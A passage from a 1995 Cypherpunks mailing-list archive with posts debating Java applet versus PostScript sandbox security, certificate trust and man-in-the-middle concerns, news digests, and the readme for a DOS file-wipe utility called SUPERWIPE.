Mitch could easily handle, by replacing "a number ... key" with "3
times", but it gives you the idea.)


All of these can involve psychological manuevers, like "informal 
coding".  That is, trying to sneak some information by Mitch that he 
*should* edit if he knew what he was good for him, but he doesn't 
realize it.  This gets really interesting, trying to communicate 
something to your actual recipient without letting Mitch realize what 
you are communicating.

The "tell me [something only you would know]" game is a good example of
that.


I think method 4 is the best method.  Method 1 is more reliable, but
much more expensive and I have a strong aversion to making it necessary
for everyone to publicize their True Name.  I don't know if method 5 
is even feasible.  :-)

Of course, there is no reason not to use many different methods
simultaneously.


Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMHoR6/WZSllhfG25AQFgbwP/fTXZTRGdPL1GIzep+0YS9lD/GigW9XHP
8SiF8y+AxmVXeYYE0Jwj7T2MPNE298H1V8ZQQXq6ClLSJjXbvOnCGN35mhu0xR+l
MdaCiV2LOpLs8tXVDSkuLfJBcVdJRR7TuyXYTBSdAf2pTn6SOkmMhIKe7z/6fj7h
qrRMjCPRL5s=
=8QFl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Mon, 9 Oct 95 22:36:21 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: java security concerns
In-Reply-To: <199510100457.AAA00235@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.90.951010002834.2770A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Iam sorry I dont fallow your logic. You find Postscript files
save because you can set up the interpreter to ignore Postscript commands
to write to files and execute programms (check the CIAC alerts), yet
you find Java applets insecure even when you can set up the same
restrictions and more under HotJava (and hopefully Netscape)?
That does not compute. Granted Java is certanly more complex than postscriptm
it a genereric programming language, and will be used by more people.
But that same concept aply.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Tue, 10 Oct 1995, Perry E. Metzger wrote:

> Postscript is completely safe if the interpreter is emasculated, and
> most of them are. (It is a huge risk when run on a non-emasculated
> interpreter, but fortunately it is easy to castrate one of the things.)
> 
> Java isn't like that, unfortunately. I wish it was simply a
> display-postscript like thing that built pretty pictures inside a
> confined window -- I could trust that to be done right if it was done
> carefully.
> 
> Perry
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 10 Oct 95 00:37:16 PDT
To: cypherpunks@toad.com
Subject: Re: java security concerns
Message-ID: <199510100737.AAA21881@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:15 AM 10/10/95 -0400, Ray wrote:
>  There is a large class of Java apps that need no file i/o capability.
>99% of all Java apps on the web right now don't save any persistent state 

While file I/O, especially file writes, are certainly a major concern,
network capability is also critical - and I would guess that most of the
interesting applets aren't just animated Christmas trees and image advertising -
they'll be things to help you fill out a form correctly and send it in,
or have buttons that say "order me".  If they can issue outgoing messages
of their own, they can spam, and they can send worms.

> But it's still unclear whether those lack "i/o capabilities",
>given that some postscript printers run operating systems and tcp/ip stacks

Unlike network-equipped PS printers, which are a relatively small fraction
of the market, and which usually don't get requests from the outside world
sent to them through firewalls, we're talking about something that will be
in Netscape, where anybody who clicks a button on anything on the web can
download an executable page...  It's a bit hard for network printers to find
each other in most places; it's much easier for Netscape sessions to do so.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Mon, 9 Oct 95 21:42:35 PDT
To: cypherpunks@toad.com
Subject: Re: java security concerns
In-Reply-To: <199510100051.RAA03799@infinity.c2.org>
Message-ID: <199510100442.AAA10517@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  I think to require formally proven implementation for something
like Java is simply unreasonable. Even if it were possible. The
whole computer market, and for that matter, most of the market as a
whole, relies on "unproven" products. Most of what you buy and use is
based on a notion of "quality" which is merely an inductive argument
that the product had no problems in the past. Everytime you buy a piece
of software and use it, you risk your security. Everytime you ftp
something off the net and run it, you are taking that risk. How do you know 
MS Word doesn't have security holes or trojan horses built in, have you 
seen the source? Software always has bugs, holes, and security flaws. It 
always will. If we were to require each new generation of software to be
"formally correct", software would never evolve. There is an important
feedback process between customers, software companies, and even
hackers, that drives software towards higher quality. Perfect software
implementations proven correct by mathematics is a pipe dream. Maybe
you can have higher confidence in small, simple software -- I've heard
Negroponte expressing that nostalgia for the days of word processors
that ran in 32k of ram, but frankly, I'm glad those days are gone.

   Will the IPv6 and IPSEC stack implementations be formally proven 
correct?   

  Yes, it may be possible that exploiting holes in Java will be easier
than those in sendmail, just as it is easier to exploit a hole in 
software on a networked machine rather than a non-networked one. But this
can not be an argument against Java or its utility. The same arguments
were raised when Postscript first came out, yet the huge benefits
of postscript are obvious, while the amount of security damage
done by it is minimal. Java will have lots of holes. It will go through
the same evolutionary progress that all software does. Sendmail was
given a chance to evolve, I think Java deserves the same
chance, given its potential.

-Ray








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Mon, 9 Oct 95 21:50:34 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Java bugs found?
In-Reply-To: <199510100349.XAA20771@book.hks.net>
Message-ID: <199510100450.AAA12123@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> So much for guaranteed security. There is one question on my mind. Why do
> today's programs have to try to do it all? Why the heck does a
> wordprocessor have to ship with a compiler built in? Not to mention that

  Possibly because it makes applications a lot more usable if they are
extensible.

-Ray



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 9 Oct 95 21:58:03 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: java security concerns
In-Reply-To: <199510100442.AAA10517@clark.net>
Message-ID: <199510100457.AAA00235@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray Cromwell writes:
>   Yes, it may be possible that exploiting holes in Java will be easier
> than those in sendmail, just as it is easier to exploit a hole in 
> software on a networked machine rather than a non-networked one. But this
> can not be an argument against Java or its utility. The same arguments
> were raised when Postscript first came out, yet the huge benefits
> of postscript are obvious, while the amount of security damage
> done by it is minimal.

Postscript is completely safe if the interpreter is emasculated, and
most of them are. (It is a huge risk when run on a non-emasculated
interpreter, but fortunately it is easy to castrate one of the things.)

Java isn't like that, unfortunately. I wish it was simply a
display-postscript like thing that built pretty pictures inside a
confined window -- I could trust that to be done right if it was done
carefully.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 9 Oct 95 21:58:08 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Java bugs found?
In-Reply-To: <199510100042.UAA24769@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.951010005428.16914B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Netscape pulled all the 2.0 betas that supported Java yesterday,
> due to a recently discovered Java security hole.  So the 32 bit
> Windows versions, SunOS, Solaris and SGI versions were removed.
> There was a README explaining this there last night, but I can't
> find it today.

What am I bid for this rare n32e20b1.exe downloaded Saturday night.  An 
instant classic at 2.6 megs.

DCF 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Mon, 9 Oct 95 23:39:54 PDT
To: cypherpunks@toad.com
Subject: [NOISE] was Re: java security concerns
Message-ID: <199510100639.BAA19818@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



This is a bit off-topic, but hopefully interesting.

Rather than trying to prove a program to be correct (which I agree is doomed
to failure for the forseeable future for all but trivial programs), perhaps
it would be useful to have an automated therom-prover to try to deduce
"interesting things" about certain programs such as "this program always
bounds-checks its input", "this program allows writes to arbitrary files on
lines x, y, and z", "this program halts". (:>)  Obviously (as the last example
illustrates), this isn't perfect because something can be true without being
provable.  Further, it's likely that assumptions must be made about system
calls, libraries, and the ways in which they interact.  There's also the
problem of "who proves the prover".  However, I think such a tool would be
useful because it may quickly point out things not obvious to (most) humans
and getting some idea of what can't be deduced and why would be instructive.


                          | (Douglas) Hofstadter's Law:
Frank Stuart              | It always takes longer than you expect, even 
fstuart@vetmed.auburn.edu | when you take into account Hofstadter's Law.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 9 Oct 95 22:48:05 PDT
To: Aleph One <aleph1@dfw.net>
Subject: Re: java security concerns
In-Reply-To: <Pine.SUN.3.90.951010002834.2770A-100000@dfw.net>
Message-ID: <199510100547.BAA00623@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Aleph One writes:
> Iam sorry I dont fallow your logic. You find Postscript files
> save because you can set up the interpreter to ignore Postscript commands
> to write to files and execute programms (check the CIAC alerts), yet
> you find Java applets insecure even when you can set up the same
> restrictions and more under HotJava (and hopefully Netscape)?
> That does not compute.

Yes it does.

To (perhaps over)simplify my point, the Java interpreter cannot be
stripped of all i/o capabilities and still remain useful. I can
physically remove all the "dangerous" calls from a Postscript
interpreter and still have it be useful.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Mon, 9 Oct 95 23:16:10 PDT
To: perry@piermont.com
Subject: Re: java security concerns
In-Reply-To: <199510100547.BAA00623@jekyll.piermont.com>
Message-ID: <199510100615.CAA00389@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Aleph One writes:
> > Iam sorry I dont fallow your logic. You find Postscript files
> > save because you can set up the interpreter to ignore Postscript commands
> > to write to files and execute programms (check the CIAC alerts), yet
> > you find Java applets insecure even when you can set up the same
> > restrictions and more under HotJava (and hopefully Netscape)?
> > That does not compute.
> 
> Yes it does.
> 
> To (perhaps over)simplify my point, the Java interpreter cannot be
> stripped of all i/o capabilities and still remain useful. I can
> physically remove all the "dangerous" calls from a Postscript
> interpreter and still have it be useful.

  There is a large class of Java apps that need no file i/o capability.
99% of all Java apps on the web right now don't save any persistent state 
information. I couldn't find any Java apps on the Java page that
used file i/o.  If by "stripped of i/o capabilities", you mean
that the Java interpreter is not permitted to ever call open/read/write,
not even to read in files it needs like config/preferences files or 
dynamically linked libraries, I'd say that's absurd. There's not many 
things that can be stripped of such capabilities, including postscript
interpreters, except for those which run the interpreter straight
out of rom. But it's still unclear whether those lack "i/o capabilities",
given that some postscript printers run operating systems and tcp/ip
stacks, and it is feasible for the interpreter to crash and execute
an i/o call. However, the Java interpreter can certainly be compiled
to not allow Java applets to ever do disk or network i/o. It doesn't
even take a recompile. Just delete the file i/o class.  

  It is certainly possible, to within a high degree of confidence,
to "box in" all i/o calls, especially if they are run in a separate
process. 

-Ray







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Mon, 9 Oct 95 23:18:01 PDT
To: frissell@panix.com (Duncan Frissell)
Subject: Re: Java bugs found?
In-Reply-To: <Pine.SUN.3.91.951010005428.16914B-100000@panix.com>
Message-ID: <199510100617.CAA00753@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> > 
> > Netscape pulled all the 2.0 betas that supported Java yesterday,
> > due to a recently discovered Java security hole.  So the 32 bit
> > Windows versions, SunOS, Solaris and SGI versions were removed.
> > There was a README explaining this there last night, but I can't
> > find it today.
> 
> What am I bid for this rare n32e20b1.exe downloaded Saturday night.  An 
> instant classic at 2.6 megs.

  Hehe, I dunno, but whatever you're asking, I'll undercut you as I have
it also. Unless you'd like to start an oligarchy. Let's talk. ;-)


-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Tue, 10 Oct 95 00:30:41 PDT
To: cypherpunks@toad.com
Subject: UK key escrow effort?
Message-ID: <199510100730.DAA03927@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Anyone heard anything about this?  Please email me direct if you have info.
TTYL.

--
<A HREF="http://www.eff.org/~mech/">          Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>       Online Activist           



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Tue, 10 Oct 95 02:48:16 PDT
To: cypherpunks@toad.com
Subject: PC disk wipe software - SUPERWIPE 1.04R
Message-ID: <199510101324.IAA14089@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


     PC disk wipe software -  SUPERWIPE 1.04R

Note: SUPERWIPE is also a SUPER ERASER with powerful erase features.


   As a matter of fact, I have written a shareware program that is a PC
wipe program: SUPERWIPE 1.04R . I just sent a copy to Perry Metzger. If
anyone else wants a copy, let me know. Its free to Cypherpunks.

   There are two big problems with writing a PC disk wipe program.
1. Compressed disks. With compressed disks you don't know how long to
make the write. You try putting all 1's or all 0's and the disk compressor
will compress it next to nothing. In fact, it may write the wipe data to
different clusters than the original file. 2. Software disk caches and
even worse -  hardware disk caches. - Those 256k disk caches. With caches,
if you do multi-wipes of a file, in actuallity, you only do one real wipe
& several virtual (to RAM) wipes.

   It might be possible to get around the first problem by using direct
sector writes (INT 13 SERVICE 3) instead of well behaved (INT 21 SERVICE
40) writes. But this is a rather dangerous practice as if you make a
mistake you might wreck the hard disk partition.

   Concerning the second, I see no practical way around the problem of
hardware disk caches keeping the user from making multiple wipes of a
file.

   As for making multiple wipes of CURRENTLY unused disk space, my SUPER-
WIPE will do that with the options:  /oldx /n   . Where oldx points at the
diskette drive or hard disk partition to be wiped & /n tells how many
wipes to do (1-9).

   As for the problem of getting rid of old buffer data writes to the end
of last file cluster writes, my program doesn't handle that. However, if
there is no disk compressor, I don't think it would be that hard to write
a function to handle it. In reality, I don't think that this problem is
much of a problem anyway. It would only occur at the end of small files.

   I suspect that the wipe problems that we have with the DOS operating
system are shared with most other operating systems.

   I uploaded SUPERWIPE to an anon ftp site. I believe it was Alex De
Joode (or spelled something like that) who gave approval for the upload.
It seems like it was a Utopia site. I lost my file on it and have now for-
gotten. If anyone needs SUPERWIPE, send me a request.

Some documentation follows for SUPERWIPE 1.04R:

-------------Start of readme.spr file---------------------------------

              SUPERWIPE
   current version: 1.04r



   SUPERWIPE is a utility that will substantially increase the security of
your computer. What does SUPERWIPE do? In order to explain what it does, I
first need to explain some security holes in the DOS operating system as
it works with disks.

   The delete & erase DOS instructions are convenient utilities that allow
you to get rid of old files. They don't actually destroy the files. They
merely mark these files so that they will be ignored by the DOS operating
system. Most of the time this is good enough. But what if you have sensi-
tive files that must not be recovered? A snoop could use the popular DOS
undelete command or another utility program to entirely recover these
files.

   To solve this problem, wipe programs were invented. A wipe program will
write a character, usually a 0 or a 1, over your entire file & then delete
it. In this way, your sensitive files are made non-recoverable.

NOTE: SUPERWIPE currently only works with non-compressed disks.

    SUPERWIPE also does this but with some improvements! SUPERWIPE
(unregistered) will enable you to :



1. allow multiple files to be wiped instead of just one!

2. use wildcards!

3. mix your regular files with wildcards in any order you choose!
 Multiple wildcards may be interspersed with multiple regular files!

4. reduce your file to zero bytes, so that a snoop cannot determine with
   certainty what the original size was!

5. rename your file to a single letter, so that a snoop cannot determine
   what the original name was!

6. access several disk partitions (c: d: e: etc..) & diskette drives in
   one run!

7. starting with version 1.03, SUPERWIPE now has SUPER ERASE capabilities
   as well.

   All of the above capabilities are contained in this program.


 

         ADVANTAGES OF REGISTRATION FOLLOW:

   When you register, you will receive a registered version, that in
 addition to the above capabilities, will allow you to:

1: Wipe out all previously erased or deleted files! (The /OLD option.)

   The registered version will also have a nicer execution message that
 will lack the plea for money.

   You are probably wondering why you would want the capability to wipe
out all previously deleted files. There are two reasons: one fairly ob-
vious; one not.

   Firstly, those old deleted files may be sensitive & you forgot to wipe
them properly. Or maybe, you were busy at an earlier time & did not take
the time to properly wipe all the sensitive files. Or, you may not remem-
ber wheather you wiped or erased a sensitive file. With the /OLD option,
you can be sure that they are all wiped!

   Secondly, many programs, including some word processors, make temporary
files that are used to assist that program in its work. When the program
is done, those programs are deleted. Ordinarily, this is fine, but it does
leave a security hole. The /OLD option will wipe out all of them!

Note: Since the /OLD option must go through the entire "unused" disk par-
tition or diskette, it may take several minutes to complete.

2.   Registered users, will also be notified of improved versions of
SUPERWIPE.

3.   Upgrades, at least for the next upgrade, will only be $10.

4.   Registered users will also receive telephone support.


5.   Also, the registered user will have a clear conscience & will use
SUPERWIPE with a feeling of sublime legitimacy!

   Site licenses are also available.

-------------End of readme.spr file---------------------------------



-------------Start of .com help file------------------------------------
Gary's super file wipe/erase program. ver.  1.04r   Copyright 1995 Gary Jeffers
This ver. does not work with compressed disks.


Nothing to do.

Invocation syntax    w filename1 filename2  ... wildcard1 wildcard2 ...
 /(no. of wipes for disk) /n(one alpha letter name of alternate file)
 /old{partition or drive letter} - (wipe all old deletes.-reg. only)

/e for regular ERASE mode only - NO wipes.

no parenthesis or braces in actual command line.

The order of the tokens does not matter.
examples:    w my.fil new.fil /olda *.exe next????.com /5 /na
w this.fil /e wild????.exe /nc anot????.com second.fil
w that????.* /nk last.fil /oldc

-------------End of .com help file------------------------------------




THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY.
The United States "Federal" Government - We'll be even more American
without it.

                                           PUSH EM BACK! PUSH EM BACK!
                                           WWWAAAYYYY  BBBAAACCCCK!
                                           BBBEEEAAATTTT  STATE!

                                           Gary Jeffers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 10 Oct 95 03:22:23 PDT
To: cypherpunks@toad.com
Subject: Re: java security concerns
In-Reply-To: <199510100457.AAA00235@jekyll.piermont.com>
Message-ID: <9510101020.AA21924@all.net>
MIME-Version: 1.0
Content-Type: text


Perry writes:
> Ray Cromwell writes:
> >   Yes, it may be possible that exploiting holes in Java will be easier
> > than those in sendmail, just as it is easier to exploit a hole in 
> > software on a networked machine rather than a non-networked one. But this
> > can not be an argument against Java or its utility. The same arguments
> > were raised when Postscript first came out, yet the huge benefits
> > of postscript are obvious, while the amount of security damage
> > done by it is minimal.
> 
> Postscript is completely safe if the interpreter is emasculated, and
> most of them are. (It is a huge risk when run on a non-emasculated
> interpreter, but fortunately it is easy to castrate one of the things.)

I'm not clear on what you mean by emasculated.  It seems to me that
postscript interpreters are full of holes that can be exploited by
a cleaver enough attacker.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 10 Oct 95 03:44:37 PDT
To: rjc@clark.net (Ray Cromwell)
Subject: Re: java security concerns
In-Reply-To: <199510100442.AAA10517@clark.net>
Message-ID: <9510101042.AA22924@all.net>
MIME-Version: 1.0
Content-Type: text


>   I think to require formally proven implementation for something
> like Java is simply unreasonable. Even if it were possible. The
> whole computer market, and for that matter, most of the market as a
> whole, relies on "unproven" products. Most of what you buy and use is
> based on a notion of "quality" which is merely an inductive argument
> that the product had no problems in the past. Everytime you buy a piece
> of software and use it, you risk your security. Everytime you ftp
> something off the net and run it, you are taking that risk. How do you know 
> MS Word doesn't have security holes or trojan horses built in, have you 
> seen the source? Software always has bugs, holes, and security flaws. It 
> always will. If we were to require each new generation of software to be
> "formally correct", software would never evolve. There is an important
> feedback process between customers, software companies, and even
> hackers, that drives software towards higher quality. Perfect software
> implementations proven correct by mathematics is a pipe dream. Maybe
> you can have higher confidence in small, simple software -- I've heard
> Negroponte expressing that nostalgia for the days of word processors
> that ran in 32k of ram, but frankly, I'm glad those days are gone.

What you miss is the distinction between different kinds of programs and
their protection implications.

	Networking programs with unintended flaws may allow outsiders
	to gain access to your internal network and do harm.

	Non-networking programs with unintended flaws may fail to operate
	properly or act as a vector for the spread of corruption, but
	they don't give outsiders unlimited insider access without insiders
	somehow facilitating the process.

That's why we are far more concerned about networking programs that about
word processors.

	In terms of word processors with Trojan horses, we don't want
them either, but there's a big difference between a Trojan horse and the
ability to spread a virus.  Viruses can spread whenever there is sharing
and general purpose programming.  Hence, most modern spreadsheets, word
processors, Postscript interpreters, etc. allow viruses to spread.

	A big problem with remote auto-execution is that it allows
someone not authorized to use your computer decide to run a program on
it.  This may make you the unwhitting vector for a virus, cause your
system to crash, etc.  With auto-execution, the web turns from a
networked read-only database with limited searching capabilities into a
giant distributed processor in which the users have little or no control
over what their computers are used for.

The battle is for control over your own computer and what it does.

>    Will the IPv6 and IPSEC stack implementations be formally proven 
> correct?   
>
>   Yes, it may be possible that exploiting holes in Java will be easier
> than those in sendmail, just as it is easier to exploit a hole in 
> software on a networked machine rather than a non-networked one. But this
> can not be an argument against Java or its utility. The same arguments
> were raised when Postscript first came out, yet the huge benefits
> of postscript are obvious, while the amount of security damage
> done by it is minimal. Java will have lots of holes. It will go through
> the same evolutionary progress that all software does. Sendmail was
> given a chance to evolve, I think Java deserves the same
> chance, given its potential.

I don't see any huge benefits to postscript.  In fact, postscript files
are essentially impossible to search for items of interest, to display
on a normal video screen, to quote from without reentering the data, etc.

The point is, do we want to turn the Web into a distributed computing
environment in which anyone can eecute any code on anyone else's
computers?

	Don't assume I am against it - after all, I was the only vocal
	proponent of viral computing for almost 5 years and got
	villafied for it plenty of times. 

I am in favor of making the decision conciously, not by accident or
ignorance, and providing proper protection mechanisms.  If the question
of Hot Java is asked in terms of permitting all computers using the Web
to become part of a global viral computing environment, I am ready to
hear the answer.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 10 Oct 95 04:03:15 PDT
To: cypherpunks@toad.com
Subject: LOG_rea
Message-ID: <199510101103.HAA04498@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-10-95. NYPaper:


   "Deleted, but Not Gone or Forgotten."

      Files produced by Microsoft Office Windows applications,
      including Word, Excel, Powerpoint and Access, often
      incorporate chunks of data previously deleted from the
      disk on which the files were saved. Microsoft said the
      problem was solved in earlier versions of Microsoft Word
      but that it has recurred in the new version for Windows
      95. Third-party programmers report another security
      lapse. Word offers optional password protection by
      encryption. The encryption, however, does not extend to
      "objects" within the file.


   "Chip Maker Introduces a Chip for Super Use and for
   Modems."

      One of the most closely watched Silicon Valley start-up
      companies plans on Tuesday to disclose details of an
      ambitious computer chip that it hopes will one day be
      used in everything from cable modems to supercomputers.
      Microunity Systems Engineering Inc. said its chips would
      be able to process information 10 times faster than
      today's personal computer microprocessors. The chip will
      consist of 10.5 million transistors and will process
      data at a gigahertz, or a billion operations a second.
      It is designed so that it can process information in
      parallel and will be capable of issuing up to four
      128-bit-wide instructions simultaneously.


   2: LOG_rea  (10 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 10 Oct 95 05:44:46 PDT
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: Certificate proposal
In-Reply-To: <9510092311.AA27677@alpha>
Message-ID: <9510101243.AA28296@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Scott Brickner writes:
 > I disagree.  The MITM is foiled by one successful communication. 

I'm going to need some clarification of this; what is meant by
"successful"?  If you mean "a communication without a MITM
participating", and presuming also that that communication would
involve a key validation, then I suppose it's true.  However, I don't
see how this success can be evaluated if the parties do not have
nearly complete control over the communications substrate.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 10 Oct 95 05:58:25 PDT
To: "Don M. Kitchen" <don@cs.byu.edu>
Subject: Re: Certificate proposal
In-Reply-To: <9510091715.AA27991@alpha>
Message-ID: <9510101258.AA28275@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Don M. Kitchen writes:
 > >  If we are forced to exchange keys remotely, then perhaps some sort of
 > >  "proof" techniques could be used to establish to some level of
 > >  assurance that the remote entity I *think* is you is really you.  Or
 > 
 > So who is Pr0duct Cypher then? And why should I have to produce ID saying 
 > my name is Don, unless I'm proving my Real Name[tm] is Don.

Right.  If we're forced to exchange keys remotely, I just have to deal
with the possibility that I'm being spoofed.

 > >  you could provide me with a key, and then I could poll a list of
 > >  references to inquire as to the "goodness" of the key.  This seems to
 > 
 > But there's no way to prove that there's no MITM. But "middle" is a
 > subjective term.

Yes, that's why I put "proof" in quotes.  I guess I meant "demonstrate
to a personally sufficient level of satisfaction".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 10 Oct 95 06:02:10 PDT
To: perry@piermont.com
Subject: Re: java security concerns
In-Reply-To: <Pine.SUN.3.90.951010002834.2770A-100000@dfw.net>
Message-ID: <9510101301.AA28597@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Perry E. Metzger writes:
 > To (perhaps over)simplify my point, the Java interpreter cannot be
 > stripped of all i/o capabilities and still remain useful. 

?!?  What if all I give you is a couple of Java classes that write to
a frame buffer, and that frame buffer is the screen (or your 24-pin
dot matrix printer or whatever)?

 > I can
 > physically remove all the "dangerous" calls from a Postscript
 > interpreter and still have it be useful.

I don't see the difference.  An interpreter is an interpreter.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 10 Oct 95 05:31:45 PDT
To: cypherpunks@toad.com
Subject: NOD_out
Message-ID: <199510101231.IAA11016@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-10-95. W$Japer:


   A long front page lead nodder on the burgeoning "space race"
   to build global satellite telecommuncations systems, for
   video, phone, data and other transactional bile.

   A related gagger on "media processors," a new generation of
   chips -- for video, graphics, on-line services, wireless
   data, telephone and audio -- being developed by MicroUnity,
   Chromatic Research, IBM and TriMedia. This is a more
   comprehensive pack-o-lies of the NYPaper spitter today on
   MicroUnity.


   NOD_out  (28 kb in 2 parts)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 10 Oct 95 09:06:08 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <199510100721.AAA20956@ix.ix.netcom.com>
Message-ID: <199510101604.JAA17611@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart <stewarts@ix.netcom.com> writes:

>As far as privacy goes, this set of keys and certifications lets you create
>private communications (using signed DH, etc.) with the entity that owns
>the private key for Bank Account X.  No, you don't know if that entity
>is really Alice or really MITM; in fact you don't know Alice's name, if it's
>done right.  You just know that the Bank says it will honor requests for money
>from Bank Account X (assuming you know where to find the Bank, which is a
>separate
>but similar problem.)  So assuming you're selling politically correct
>widgets and not
>pharmaceuticals or financial privacy consulting services, you probably don't
>care too much about who's on the other end - the person who's giving you
>the money is the person you want to be talking to.

Still, there is a problem here: how did the bank know that it _should_
honor requests to withdraw money from bank account x if they are signed
with a certain key?  How did it determine that that is a valid key, if it
never had a secure channel to the person opening the account?  I think
the answer is clearly that it cannot, that it must have had a secure
channel.  Would a certificated key presented by Alice have been
sufficient to create such a channel, do you think, or would a face to
face meeting have been necessary?  (Or would an uncertificated key be
adequate?)

>In the case of the Bank, the reason you trust the Bank isn't that you know
>them physically (though it was interesting when I started dealing with a
>local bank where the tellers knew me by name after only two or three visits);
>knowing your local Savings and Loan by name doesn't guarantee you can get any
>money out of them if there's a bank run, nor does it really guarantee that they
>won't embezzle the funds and head for Argentina.  The reason you trust them
